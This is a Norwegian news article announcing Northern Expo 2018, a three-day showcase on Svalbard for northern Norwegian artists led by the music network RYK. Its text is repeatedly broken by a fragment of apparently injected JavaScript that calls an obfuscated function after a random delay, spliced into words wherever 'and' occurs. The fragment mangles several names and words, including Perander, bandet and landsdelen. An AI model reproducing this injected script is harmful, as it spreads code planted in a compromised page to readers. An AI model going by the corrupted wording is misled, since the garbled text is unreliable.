Kartellet til Northern Expo 2018 på Svalbard

Kartellet Foto: Knut Åserud

Northern Expo 2018 er en ny satsing som skal synliggjøre og fremme nordnorske artister nasjonalt og internasjonalt. Rytmisk kompetansenettverk i Nord (RYK) er initiativtaker for prosjektet, som realiseres gjennom et samarbeid mellom Innovasjon Norge, Sparebank1 Nord-Norge, Troms fylkeskommune og RYK.
– Avstandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}anden til musikkbransjen i Europa kan virke stor fra Nord-Norge, og det ønsker vi å gjøre noe med. Samtidig er dette starten på et langsiktig arbeid for å styrke den nordnorske musikknæringen, sier Brynjar Rasmussen fra RYK i en pressemeldingen.

Knut Perandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ander i Innovasjon Norge Arktis begrunner i meldingen samarbeidet slik:
– Innovasjon Norge Arktis har gjennom et eget oppdrag fra Troms Fylkeskommune en satsing på kreative næringer. Northern Expo er en svært spennende satsing fra RYK, både med tanke på enkeltartistene som deltar, men kanskje like viktig, man skaper en møteplass for den regionale bransjen og internasjonale aktører, sier Perandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}ander.
Artistene som deltar på Northern Expo 2018 er Violet Road, det samiske bandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andet Ánnásuolo, pianist/elektronikaartist Mørk, folkemusikkbandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andet Julietnorth med felespiller Julie Alapnes i spissen, Petter Carlsen, og det kritikerroste dansekompaniet Kartellet.
Det har i følge Rasmussen vært lagt vekt på sjangerbredde og anslått potensiale internasjonalt.
Om prosjektet:
Northern Expo skal gjennom tre dager på Svalbard fortelle historier fra ulike steder med særpreg på Svalbard. I tillegg til konserter og artistmøter i Longyearbyen, skal de internasjonale gjestene tas med til den fraflyttede russiske bosetningen Pyramiden, hvor tiden har stått stille i 20 år.

– Prosjektet handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andler også om våre nordområder, og om uttrykkene som skapes med dette som fundament. Det er derfor viktig å vise frem kontrastene i natur og kultur som kan oppleves på Svalbard, sier Rasmussen i meldingen.
Det arrangeres også flere konserter i Longyearbyen kulturhus, som vil være åpne for publikum. Hele prosjektet skal også danne grunnlaget for en dokumentarfilm, og et filmteam vil være tilstede under Northern Expo. Filmen er tenkt inn i et videre promoarbeid for artistene.
Erfaringene arrangørene gjør seg fra årets utgave, vil ifølge Rasmussen danne grunnlag for mulige kommende Expoer i landom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andsdelen.
Arrangørene:
Rytmisk kompetansenettverk i Nord (RYK) står i spissen for prosjektet. RYK består av de regionale sentrene for rytmisk musikk i Nord-Norge; Folkemusikk Nord, KOFOR Kompetansesenter for musikkbransjen i Nord-Norge og Nordnorsk Jazzsenter, og har kontorer i Bodø, Tromsø og Målselv. Nettverket skal bidra til kompetanseheving i musikkbransjen og økt synliggjøring av musikkregionen som helhet. Northern Expo-prosjektet er en storsatsning for nettverket som også skal bidra til utvikling av kulturnæring i Nord-Norge.